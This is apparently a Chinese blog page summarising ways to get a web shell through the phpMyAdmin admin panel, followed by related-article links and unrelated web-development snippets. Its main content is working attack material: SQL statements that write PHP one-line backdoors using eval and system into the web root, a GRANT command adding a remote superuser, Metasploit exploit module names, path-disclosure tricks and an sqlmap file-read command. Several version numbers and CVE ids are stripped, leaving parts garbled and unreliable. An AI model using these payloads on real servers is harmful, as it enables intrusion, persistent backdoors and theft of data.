phpmyadmin后台拿shell方法总结
方法一: CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL ); INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>'); SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php'; ----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/.php 一句话连接密码:xiaoma 方法二: Create TABLE xiaoma (xiaoma1 text NOT NULL); Insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>'); select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php'; Drop TABLE IF EXISTS xiaoma; 方法三: 读取文件内容: select load_file('E:/xamp/www/s.php'); 写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php' cmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php' 方法四: select load_file('E:/xamp/www/xiaoma.php'); select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php' 然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir
phpmyadmin 漏洞总结 (-- ::) 一: 影响版本: < -rc3 概述:PhpMyAdmin存在PREG_REPLACE_EVAL漏洞 利用模块:exploit/multi/http/phpmyadmin_preg_replace CVE: CVE-- 二: 影响版本:phpMyAdmin v3. 概述:PhpMyAdmin存在server_sync.php 后门漏洞 利用模块:exploit/multi/http/phpmyadmin_3522_backdoor CVE: CVE-- 三: 影响版本: .x < 3.1.3.1; 概述:PhpMyAdmin配置文件/config/config.inc.php存在命令执行 利用模块:exploit/unix/webapp/phpmyadmin_config CVE: CVE-- . 影响版本:phpmyadmin --phpmyadmin 2.11.4利用方式:直接在phpmyadmin的用户名内填入: 密码空 'localhost'@'@" 复制代码5. phpMyAdmin < .x Swekey远程代码注入攻击 . phpmyadmin 2.80 反序列 lfi、 rfi包含 漏洞文件 ss phpmyadmin一句话开启外链mysql :添加超级用户guetsec密码ooxx并且允许外连 GRANT ALL PRIVILEGES ON *.* TO 'guetsec'@'%' IDENTIFIED BY 'ooxx' WITH GRANT OPTION; phpmyadmin 暴绝对路径: . 用Web路径自动盲爆工具 V2. 乌云内测(带字典).rar .扫phpinfo.php info.php php.php test.php等等 . 上传图片 超长文件名! .phpmyadmin构造xml上传暴路径 .phpmyadmin读取系统文件cmd爆路径! .phpmyadmin读取 iis6,iis7配置文件 读取apache Nginx 配置文件! windows2003 iis6配置文件所在位置C:\Windows/system32\inetsrv\metabase.xml win2008/ iis7. 在这个文件C:\Windows\System32\inetsrv\config\applicationHost.config apache配置:/etc/httpd/conf/httpd.conf /usr/local/apache2/conf/httpd.conf Nginx配置 /etc/nginx/conf.d/vhost.conf /usr/local/etc/nginx/nginx.conf 穿山甲只能读一部分, 上sqlmap sqlmap -u url --file-read 'C:\Windows\System32\inetsrv\config\applicationHost.config'
phpmyadmin后台拿shell方法总结的更多相关文章
- KesionCMS V6.5后台拿SHELL方法
Title:KesionCMS V6.5后台拿SHELL方法 --2011-03-29 00:21 最近弄一个站点,是KesionCMS V6.5的WEB系统,试了下后台拿webshell方法,记下 ...
- PhpMyadmin后台拿webshell方法总结
前言: phpmyadmin后台拿webshell的方法主要分为两个方法: (1) .通过日志文件拿webshell; (2) .利用日志文件写入一句话;(这个方法可能在实际操作中会遇到困难): 本地 ...
- 在phpmyadmin后台获取webshell方法汇总整理
方法一: CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL ); INSERT INTO `mysql`.`xiaoma` (`xiaoma ...
- phpmyadmin后台4种拿shell方法 && php爆路径大法
php后台拿shell要知道php的路径,文章下面将讲诉爆php路径的方法!!! 方法一: CREATE TABLE `mysql`.`xss` (`xss1` TEXT NOT NULL ); IN ...
- linux系统ecshop拿shell方法
Title:linux系统ecshop拿shell方法 --2011-06-08 13:23 最近弄一个站,对ECSHOP拿shell不了解,导致走了很多的弯路. nginx/0.8.54的服务器, ...
- Linux后台执行的方法 - 关闭、退出不影响
=============================================================================================nohup c ...
- 利用SQL注入漏洞登录后台的实现方法
利用SQL注入漏洞登录后台的实现方法 作者: 字体:[增加 减小] 类型:转载 时间:2012-01-12我要评论 工作需要,得好好补习下关于WEB安全方面的相关知识,故撰此文,权当总结,别无它意.读 ...
- JQuery EasyUI弹出对话框解决Asp.net服务器控件无法执行后台代码的方法(转)
原文:JQuery EasyUI弹出对话框解决Asp.net服务器控件无法执行后台代码的方法 jquery-easyui是一个基于jquery的图形界面插件,利用easyui可以创建很多好看的网页界面 ...
- CreateLiveCMSV4.0 漏洞,无需后台Get shell
Title:CreateLiveCMSV4.0 漏洞,无需后台Get shell --2012-03-06 17:28 标题:CreateLive CMS Version 4.0.1006 漏洞,无需 ...
随机推荐
- CSS 指定选择器(十一)
一.指定选择器 有时个会希望控制某个元素在一定范围内的对象样式,这时就可以把元素与Class或者Id选择器结合起来使用 <!DOCTYPE html PUBLIC "-//W3C//D ...
- CSS 通用和分组选择器(十)
一.通用选择器 通用选择器可能是所有选择器中最强大的,却使用最少的.通用选择器的作用就像是通配符,它匹配所有可用元素.通用选择器由一个星号表示.通用选择器一般用来对象页面上所有元素应用样式 例如:可使 ...
- 【转】IOS开发中图片资源使用png还是jpg格式
对于iOS本地应用程序来说最简单的答案就是始终使用PNG,除非你有非常非常好的理由不用它. 当iOS应用构建的时候,Xcode会通过一种方式优化.png文件而不会优化其它文件格式.它优化得相当的好 他 ...
- iOS设计模式-单例模式
(一)什么是单例模式(Singleton) 单例模式:保证一个类仅有一个实例,并提供一个访问它的全局访问点 *最初的定义是在<设计模式>(Addison-Wesley)中 解读 1> ...
- [windows]禁止指定用户使用远程桌面服务登录
windows2003下禁止用户远程登录的方法如下: 1.打开控制面板 > 管理工具 > 本地安全策略 2.安全策略-->本地策略-->用户权限分配-->通过终端服务拒绝 ...
- JS中的event 对象详解
JS中的event 对象详解 JS的event对象 Event属性和方法:1. type:事件的类型,如onlick中的click:2. srcElement/target:事件源,就是发生事件的 ...
- PowerDesigner执行SQL生成模型
PowerDesigner版本:15.2.0 步骤如下: 1.打开PowerDesigner软件如下图: 2.选择:File->Reverse Engineer->Database... ...
- JS的三种弹框
<script type="text/javascript"> /*第一种*/ function ale(){ alert("这是第一种");} / ...
- Neo4j图数据库管理系统开发笔记之三:构建安全的RMI Service(Server)
RMI Server(服务端)主要包括以下功能:远程用户权限验证管理.远程服务接口实现类.Neo4j实体映射转换等.项目目录结构如下图所示: 3.2.1 远程用户权限验证管理 3.2.1.1 用户权限 ...
- cocos2d-x之计时器初试
bool HelloWorld::init() { if ( !Layer::init() ) { return false; } Size visibleSize = Director::getIn ...